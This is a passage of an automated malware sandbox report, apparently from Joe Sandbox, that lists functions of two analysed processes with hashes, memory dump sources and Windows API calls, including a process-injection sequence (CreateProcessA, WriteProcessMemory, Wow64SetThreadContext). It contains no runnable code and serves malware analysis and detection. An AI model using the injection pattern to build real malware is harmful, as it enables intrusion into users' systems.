API String ID:
Opcode ID: 4801d9aec8df713d29612626255805b05b256551410ed9fe3ded876e9761e0f1
Instruction ID: a8b92a97a3251d2226ea15ea6aee5250ce371a171a4d727babebc2a9f3200169
Opcode Fuzzy Hash: 4801d9aec8df713d29612626255805b05b256551410ed9fe3ded876e9761e0f1
Instruction Fuzzy Hash: 7F01FF70D00329DFEB14CF5AC5483AE7AF5FF44354F108529E424AA290D7B54A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06BDC800 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663b7f21f57082123c66286150ae8703489ed6251554c525e86fad3316a047d3
Instruction ID: 77b536b74423f8a5c51fefdca09eade7a5d10b1e995b80ec502459817d539cdb
Opcode Fuzzy Hash: 663b7f21f57082123c66286150ae8703489ed6251554c525e86fad3316a047d3
Instruction Fuzzy Hash: E0F0A072E202289BDB549969EC00A9ABB7AE784754F104479ED11FB644EB7AAC00CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 013E0F40 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4147569687.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_13e0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404d16786685814e91aea0add504745384c2d573ab8dd94ccddf667afc2220cd
Instruction ID: eb61d25ef0d83f8ad47f250be93e14cc7a978dde9dc6e024605b1eb749c29717
Opcode Fuzzy Hash: 404d16786685814e91aea0add504745384c2d573ab8dd94ccddf667afc2220cd
Instruction Fuzzy Hash: 88E06D717002186FD3049A5F9C40E6BFBEDFFD9620B21807EE504D7361CAB0AC00C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 013E0F81 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4147569687.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_13e0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda2d0d412f1806e9ec41253af5c0cc65fa73e659b01b2603d48edcfeacc2a50
Instruction ID: 4123ef99c8138fe66e20bb85f3865366e2a199994891b5024d0465f423ae1e3f
Opcode Fuzzy Hash: fda2d0d412f1806e9ec41253af5c0cc65fa73e659b01b2603d48edcfeacc2a50
Instruction Fuzzy Hash: 03F0A0313082509FC314CB1AD884D46FBE9EFCA320B1580AAF509CB361D6719C11C750

Uniqueness

Uniqueness Score: -1.00%

Function 06BD6499 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6628664e2c2a06c834b8ca2d3ea7dd3af7952a5a23ec229769c789c6f0494f66
Instruction ID: cd9759879287456e2785d94b810f826ad0f062a18904be0cd74e6ab67ef126ac
Opcode Fuzzy Hash: 6628664e2c2a06c834b8ca2d3ea7dd3af7952a5a23ec229769c789c6f0494f66
Instruction Fuzzy Hash: 0BE012B1D100089BDF90DEA4C75539D73A4EF01208F214995C408EB201F236D9158B80

Uniqueness

Uniqueness Score: -1.00%

Function 013E0F90 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4147569687.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_13e0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e17546fa9ecd7026bd286faa4c9940197170c9f806b75d644b99792358f9f2
Instruction ID: 6588a270b63ff866b1596e199582fd390b99203d472a78fdc17ae976651e245d
Opcode Fuzzy Hash: a2e17546fa9ecd7026bd286faa4c9940197170c9f806b75d644b99792358f9f2
Instruction Fuzzy Hash: 02E0EC36305614AFC3149A4EEC88D4AFBADFFC9771B55806AFA0DC7361CA71AC01C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 06BD64A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca204dd91defff561e174270ba72908751c23eb4d71b43fb55ef8ff06695cc2
Instruction ID: 64e35174eeb889460961b570ddbe99167533852ad8a54dc2e72c7307066d592b
Opcode Fuzzy Hash: 4ca204dd91defff561e174270ba72908751c23eb4d71b43fb55ef8ff06695cc2
Instruction Fuzzy Hash: FFE0C2B0E1010CABDF50CEB5CA1575E73ACDB02208F2088E4D408CF301F276CA058B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06BD76C0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BD77BC
$fq, xrefs: 06BD7C2E
$fq, xrefs: 06BD77E1
$fq, xrefs: 06BD7C0C
$fq, xrefs: 06BD7B79
$fq, xrefs: 06BD7B6D
$fq, xrefs: 06BD7C18
$fq, xrefs: 06BD77B0
$fq, xrefs: 06BD7C22
$fq, xrefs: 06BD77ED

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1462074617
Opcode ID: 0b6baf95b965e85892a5037f8e5090691ad00a0c5888b29cbb528ccccc83504d
Instruction ID: e72aeb816239dd8aa6ef816c2f0a51a13e107c0c5003f8b13349ba09b45fd0ef
Opcode Fuzzy Hash: 0b6baf95b965e85892a5037f8e5090691ad00a0c5888b29cbb528ccccc83504d
Instruction Fuzzy Hash: 10122B70E01219CFDB68DF65C894A9EB7B2FF88304F2495A9D509AB254EF309D81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 06BDA958 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BDAAA9
$fq, xrefs: 06BDAA5A
$fq, xrefs: 06BDAAD4
$fq, xrefs: 06BDAB0A
$fq, xrefs: 06BDAB16
$fq, xrefs: 06BDAA4E
$fq, xrefs: 06BDAAB5
$fq, xrefs: 06BDAAE0

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: e1a4198dd48bb01eb220e5b9459ec57c0f490a60ac00e66857efd5ccd275bf72
Instruction ID: 8e5aae611761a982adc9f51d4185e726ea6b55abb1a00e652909bb2483de3214
Opcode Fuzzy Hash: e1a4198dd48bb01eb220e5b9459ec57c0f490a60ac00e66857efd5ccd275bf72
Instruction Fuzzy Hash: BB91A0B0A00209DFDB64DF65DA947AEBBB6FF84340F149569D4019B394EF389C41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06BD70C0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

.5~q, xrefs: 06BD711B
$fq, xrefs: 06BD73A2
$fq, xrefs: 06BD75C8
$fq, xrefs: 06BD755C
$fq, xrefs: 06BD73FC
$fq, xrefs: 06BD75D4
$fq, xrefs: 06BD7408

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1301248726
Opcode ID: e6203847d5c3c69ceebac653a0bd67eefa9c3e3fcbb1e336654be591182965e4
Instruction ID: e5ef4b00105a9c2eccd030431f55faf1e9194170e530fee57cd5c55cdeb2a00b
Opcode Fuzzy Hash: e6203847d5c3c69ceebac653a0bd67eefa9c3e3fcbb1e336654be591182965e4
Instruction Fuzzy Hash: 3CF13CB0A00209CFDB55DFA5D990AAEB7B6FF84340F248579D5159B394EF35AC82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06BDBA28 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BDBB9B
$fq, xrefs: 06BDBBDB
$fq, xrefs: 06BDBBCF
$fq, xrefs: 06BDBC03
$fq, xrefs: 06BDBC0F
$fq, xrefs: 06BDBBA7

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: 9afe123fc955e917e9fa67f2a3f06fb0bfe3367f02de7ea6312cfc7a467ad3b2
Instruction ID: 6f81bb914dd05b673f857d5c8ee54083d9120d02ad93be86651112c3666f91a4
Opcode Fuzzy Hash: 9afe123fc955e917e9fa67f2a3f06fb0bfe3367f02de7ea6312cfc7a467ad3b2
Instruction Fuzzy Hash: 2B719FF0E102098FDB68CFA9D5906ADB7B2FF84310F1585AAD4069F294EF70AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06BD83F8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BD865E
$fq, xrefs: 06BD86B7
$fq, xrefs: 06BD8652
$fq, xrefs: 06BD86C3

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: aed1aecdd33ea46ecae452271efb2599f35b0bc0a6cd81c6ebd102f157cfe577
Instruction ID: c8df25df19879a6544ababf041c6828fbb69e1152c3eb29cefbec2e23129aa37
Opcode Fuzzy Hash: aed1aecdd33ea46ecae452271efb2599f35b0bc0a6cd81c6ebd102f157cfe577
Instruction Fuzzy Hash: BDB12970A11209CFDB64DFA9C9907AEBBB6FF84301F249569D4059B395EB74DC82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06BD8810 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BD888F
$fq, xrefs: 06BD889B
LRfq, xrefs: 06BD8952
LRfq, xrefs: 06BD8903

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: LRfq$LRfq$$fq$$fq
API String ID: 0-1810675050
Opcode ID: 6c4b6204e85f55a36269d06f0db9979ce303e5a0789b8e60fb6236b90e5935b3
Instruction ID: 73a9b662b0c92f97b280892ab577b292de37d2bcf45b1ca8250f506075da49d7
Opcode Fuzzy Hash: 6c4b6204e85f55a36269d06f0db9979ce303e5a0789b8e60fb6236b90e5935b3
Instruction Fuzzy Hash: DD51B2B0B10201DFDB58DF69D980A6AB7B6FF84300F1495ADD415AF3A5EA35EC40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06BDACE2 Relevance: 5.2, Strings: 4, Instructions: 165COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BDAE11
$fq, xrefs: 06BDAEBC
$fq, xrefs: 06BDAE93
$fq, xrefs: 06BDAE64

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: d4be05e3e0c19f48594dc9fe257790536db812cacd79dc2814b1ab650307b47c
Instruction ID: 02cd5ed5f198f68ca2d24b48fe30a9ef1d2acaeee18cdaa10db814232aaf67b9
Opcode Fuzzy Hash: d4be05e3e0c19f48594dc9fe257790536db812cacd79dc2814b1ab650307b47c
Instruction Fuzzy Hash: 345196B0E10205CFDF65DF68D9806AEB7B2EB88310F2495AAD405EB394EB34DC41CB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BjTxJte.exePID: 7948, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	111
Total number of Limit Nodes:	4

Executed Functions

Function 007DD368 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 007DD3F6
GetCurrentThread.KERNEL32 ref: 007DD433
GetCurrentProcess.KERNEL32 ref: 007DD470
GetCurrentThreadId.KERNEL32 ref: 007DD4C9

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: fe989a23ffdd9a57727d411e5baa2c789bfed8b53548dbbde682a5db3861b73f
Instruction ID: 0fb801f4345911b6c8266a99c0f144dd7995ff96f3984a8b037285f1a9e48c7b
Opcode Fuzzy Hash: fe989a23ffdd9a57727d411e5baa2c789bfed8b53548dbbde682a5db3861b73f
Instruction Fuzzy Hash: 955147B09013498FDB14CFA9D948B9EBFF1EF48314F24C45AE409A73A1DB786944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007DD378 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 007DD3F6
GetCurrentThread.KERNEL32 ref: 007DD433
GetCurrentProcess.KERNEL32 ref: 007DD470
GetCurrentThreadId.KERNEL32 ref: 007DD4C9

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 113355c12b8719d218b81c61f06a1d9e8c20fab9a06056c5a1ef0bc61519df32
Instruction ID: af6ec7be8a243a45b3adf2fa59e3a36c670b13534e7e0e43f7306fc0441ee7df
Opcode Fuzzy Hash: 113355c12b8719d218b81c61f06a1d9e8c20fab9a06056c5a1ef0bc61519df32
Instruction Fuzzy Hash: D55158B0900349CFDB14CFA9D948B9EBBF1EF48314F20C45AE409A73A1DB786944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04A94B78 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(jq, xrefs: 04A95A92
Hjq, xrefs: 04A95B50

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: (jq$Hjq
API String ID: 0-2151573235
Opcode ID: 6822a0291cbe54d817a154af0e66d6d403f61f9734a02ae862370244f0b364c0
Instruction ID: cba956c786c51bdd00f0a94956f4aa1e1eb526b3e2111a65bded97b6108cefda
Opcode Fuzzy Hash: 6822a0291cbe54d817a154af0e66d6d403f61f9734a02ae862370244f0b364c0
Instruction Fuzzy Hash: 5681D171B012099FCF05EFA8C8956AEBFF2EF88310F148469E509A7391DB349D46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04A94FA8 Relevance: 2.7, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hjq, xrefs: 04A95070
Hjq, xrefs: 04A950D6

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: Hjq$Hjq
API String ID: 0-2395847853
Opcode ID: f1394b82b2b20b0df001fdc3f18023d23e37a3d1c2bc1a5def35820873737007
Instruction ID: a98ebef25002b309d5f3ea9f8b445967c00069f4bf20d733a3e3a3bc42c1be89
Opcode Fuzzy Hash: f1394b82b2b20b0df001fdc3f18023d23e37a3d1c2bc1a5def35820873737007
Instruction Fuzzy Hash: 4B815C71E002599FDF05DFA9C9946EEBBF2FF88300F14812AE409AB355DB745906CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A906E8 Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04A90736
, xrefs: 04A9072F

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3a623618ea13608401c2fa2636d7f7a2ff979fb379626b95a197268303cb52e0
Instruction ID: bae862df7f4aae14e9af5066774307c5aa6632c669f4b88f3aee8245415fb05f
Opcode Fuzzy Hash: 3a623618ea13608401c2fa2636d7f7a2ff979fb379626b95a197268303cb52e0
Instruction Fuzzy Hash: 9171BF35910601CFEB00EF28D885965B7F2FF85304B51C6A9D949AF326EF35E984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A906F8 Relevance: 2.7, Strings: 2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04A90736
, xrefs: 04A9072F

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: c2f2d1e52c23dae10890a0493e4589bfd0025134643f497576f437aff136208f
Instruction ID: 7d69254731d23c2f2bd1d67fce1cd21da0c112f1a5e43dd4078895e09b2c12ab
Opcode Fuzzy Hash: c2f2d1e52c23dae10890a0493e4589bfd0025134643f497576f437aff136208f
Instruction Fuzzy Hash: A3619E31910601CFDB00EF29D885965B7F2FF85314B51CAA9E949AB326EF35F984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 068DF915 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068DFB56

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 98348f4795287dc80772f710665286cf2408df4e4211108ac507cb34cc58828a
Instruction ID: c586da8330336e2e7ccc32b491e043ca2a35ea7cb51191cd19d89e2d3e9acca5
Opcode Fuzzy Hash: 98348f4795287dc80772f710665286cf2408df4e4211108ac507cb34cc58828a
Instruction Fuzzy Hash: B0A17A71D00219DFDB64CFA8C841BEDBBB2BF48314F14856AE909E7280DB749985DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DF920 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068DFB56

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3d3e662c9d44a685f18e885bddb838e7c20a2d4918e20ca9bbcf6ec989e97e5c
Instruction ID: 6dd674931c64af8eb97b23dc22946bec6d95aead7f60fb5ae41d1569a93c8c56
Opcode Fuzzy Hash: 3d3e662c9d44a685f18e885bddb838e7c20a2d4918e20ca9bbcf6ec989e97e5c
Instruction Fuzzy Hash: 93916B71D00219DFDB64CFA8C841BEDBBB2BF48314F14856AE909E7280DB749985DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007DACE8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 007DAF3E

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 53cfd29a6ff958d12dd6a96933f4e586b7f6b1ec8791759427960d00b25d7dbe
Instruction ID: 19333e760faece0067fe3ef894b1d316844419511b53e51c12107f8ba87628d9
Opcode Fuzzy Hash: 53cfd29a6ff958d12dd6a96933f4e586b7f6b1ec8791759427960d00b25d7dbe
Instruction Fuzzy Hash: C8711270A00B059FDB24DF69D44575ABBF2FF48300F10892AD48ADBB50DB79E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 007D58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 007D59A9

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1dc29f501c729e04f92518ef87ef1aa9848b8ebe075480ed83aef995d0b701c9
Instruction ID: b21eb6b6f0ac810761b511feadf39c94735238f8ecddc9169676015985f7f038
Opcode Fuzzy Hash: 1dc29f501c729e04f92518ef87ef1aa9848b8ebe075480ed83aef995d0b701c9
Instruction Fuzzy Hash: 2741E2B4C04729CFDB24CFA9C984B9EBBF5BF88304F20816AD448AB291DB756945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 007D44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 007D59A9

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 37fba99c052f3f6319429946d08fa8d20898e078d9ffdc98d9e6c0b4376e901f
Instruction ID: 4f5de595b8bb6275cdd24de3de50e9ce0219fcdf85e4e706ee7529d8063c5ed1
Opcode Fuzzy Hash: 37fba99c052f3f6319429946d08fa8d20898e078d9ffdc98d9e6c0b4376e901f
Instruction Fuzzy Hash: 0341B2B4D00719CFDB24DFA9C984B9EBBF5BF88304F20816AD408AB295DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 068DF690 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068DF728

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3738035129bef1f51d843fab22cc02b0e3bfa66a2f5c2b1e104db451d6771d50
Instruction ID: 4b3f280198314545f2659ba3b0566b53cd25385db2340ebae02702f95f56d0bf
Opcode Fuzzy Hash: 3738035129bef1f51d843fab22cc02b0e3bfa66a2f5c2b1e104db451d6771d50
Instruction Fuzzy Hash: 402137B5D003499FDB10CFA9C985BDEBBF5FF48320F10842AEA19A7240D7799944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DF698 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068DF728

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 02c4a43e44747f368fd57ec88c6d726d0070d55ec0350b65d6a178037c2391a0
Instruction ID: 4d1d899a1baa231b44048d79c3acb43bd42f37ee71e60f23aab3806538f28bd5
Opcode Fuzzy Hash: 02c4a43e44747f368fd57ec88c6d726d0070d55ec0350b65d6a178037c2391a0
Instruction Fuzzy Hash: B22127B5D003499FDB10CFA9C981BDEBBF5FF48320F10842AEA19A7240D7799944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007DD5B8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007DD647

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 81595fa4cc6e5950a68059cc2fd2a6e8c8611d95ca03fe6e888b166e7e433773
Instruction ID: 45177bb341c47dfaa4281cbc535a55999b282f4319a44c1075d8c8cdc660841a
Opcode Fuzzy Hash: 81595fa4cc6e5950a68059cc2fd2a6e8c8611d95ca03fe6e888b166e7e433773
Instruction Fuzzy Hash: A821E5B59012489FDB10CFAAD985ADEFBF5EB48310F24841AE918A7350D378A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DF785 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068DF808

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9b3f87cad171fc03c93ea79c1887ff3c9e9e4a475698b68bfe6fe23c137f2cbe
Instruction ID: 4a09ad1b0c315aab4fa3fbc4c620402f5822c9c0ac877599aa515863b75b0631
Opcode Fuzzy Hash: 9b3f87cad171fc03c93ea79c1887ff3c9e9e4a475698b68bfe6fe23c137f2cbe
Instruction Fuzzy Hash: 6A2128B1D003499FCB10DFAAC981ADEFBF5FF48320F50842AE619A7240D7799500DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DEC88 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068DED0E

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7fac0ecb62a5d0bdc687a938752110c1272d47cbb026b69b37e8a4f060302c95
Instruction ID: 7da48e1b915d4dbe627695f287b0d29a3c1260f2f57f070206765987e194abf5
